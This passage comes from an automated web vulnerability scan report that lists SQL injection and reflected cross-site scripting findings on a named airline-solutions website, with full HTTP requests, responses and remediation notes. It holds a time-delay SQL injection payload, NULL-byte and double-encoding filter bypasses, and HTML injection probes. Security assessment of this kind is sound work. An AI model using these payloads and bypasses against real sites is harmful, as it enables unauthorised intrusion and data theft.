User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_community_portal
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:09:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/sabre_community_portal%2527%2527 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_community_portal
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;

Response 2

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:09:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322307; expires=Thu, 06-Oct-2011 04:09:37 GMT; path=/
Set-Cookie: exp_last_activity=1286356175; expires=Thu, 06-Oct-2011 04:09:37 GMT; path=/
Location: http://www.sabreairlinesolutions.com/home/page-not-found/
Content-Length: 0
Connection: close
Content-Type: text/html


2.26. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/airline_community

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/services/airline_community HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322629; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fautomated_exchange_and_refunds%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:35:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/services/airline_community HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322629; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fautomated_exchange_and_refunds%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:35:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322629; expires=Thu, 06-Oct-2011 03:35:52 GMT; path=/
Set-Cookie: exp_last_activity=1286354150; expires=Thu, 06-Oct-2011 03:35:52 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:36:07 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.27. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/ [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/airline_community/

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/services/airline_community/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382'; exp_last_activity=1286322217; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:18:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/services/airline_community/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382''; exp_last_activity=1286322217; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:18:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322217; expires=Thu, 06-Oct-2011 03:18:52 GMT; path=/
Set-Cookie: exp_last_activity=1286353132; expires=Thu, 06-Oct-2011 03:18:52 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:18:57 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.28. http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services [exp_last_activity cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/consulting_services

Issue detail

The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the exp_last_activity cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /home/products_services/services/consulting_services HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322619%2527; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:23:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/services/consulting_services HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322619%2527%2527; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:23:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322619%27%27; expires=Thu, 06-Oct-2011 03:23:33 GMT; path=/
Set-Cookie: exp_last_activity=1286353408; expires=Thu, 06-Oct-2011 03:23:33 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:23:55 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.29. http://www.sabreairlinesolutions.com/images/uploads/flash/flvPlayer.swf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /images/uploads/flash/flvPlayer.swf

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 4. The application took 24735 milliseconds to respond to the request, compared with 266 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /images/uploads/flash/flvPlayer.swf'waitfor%20delay'0%3a0%3a20'--?width=384&height=328&flashvars=videoPath=cost_centric3.flv&hideLogo=true&newWidth=384&newHeight=328&volAudio=60 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323070; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Fsabre_revenue_integrity%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A3%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3B%7D;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 11:25:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323070; expires=Thu, 06-Oct-2011 11:26:00 GMT; path=/
Set-Cookie: exp_last_activity=1286382359; expires=Thu, 06-Oct-2011 11:26:00 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fpage-not-found%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Fsabre_revenue_integrity%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A4%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 11:26:11 GMT
Pragma: no-cache
Content-Length: 7109
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

3. Cross-site scripting (reflected)
There are 143 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://www.sabreairlinesolutions.com/home/about [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00aabbe"><a>a58115eef59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aabbe"><a>a58115eef59 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about?%00aabbe"><a>a58115eef59=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:09:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316560; expires=Wed, 05-Oct-2011 17:09:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:09:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/about?%00aabbe"><a>a58115eef59=1">
...[SNIP]...

3.2. http://www.sabreairlinesolutions.com/home/about/complete_the_picture/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/complete_the_picture/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e3fbe"><a>dc36cf7621c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3fbe"><a>dc36cf7621c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/complete_the_picture/?%00e3fbe"><a>dc36cf7621c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:09:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316573; expires=Wed, 05-Oct-2011 17:09:33 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fabout%2Fcomplete_the_picture%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:09:54 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8527


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/about/complete_the_picture/?%00e3fbe"><a>dc36cf7621c=1">
...[SNIP]...

3.3. http://www.sabreairlinesolutions.com/home/about/copyright_and_trademark/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/copyright_and_trademark/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007b237"><a>8a1a1739deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7b237"><a>8a1a1739deb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/copyright_and_trademark/?%007b237"><a>8a1a1739deb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:09:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316598; expires=Wed, 05-Oct-2011 17:09:58 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
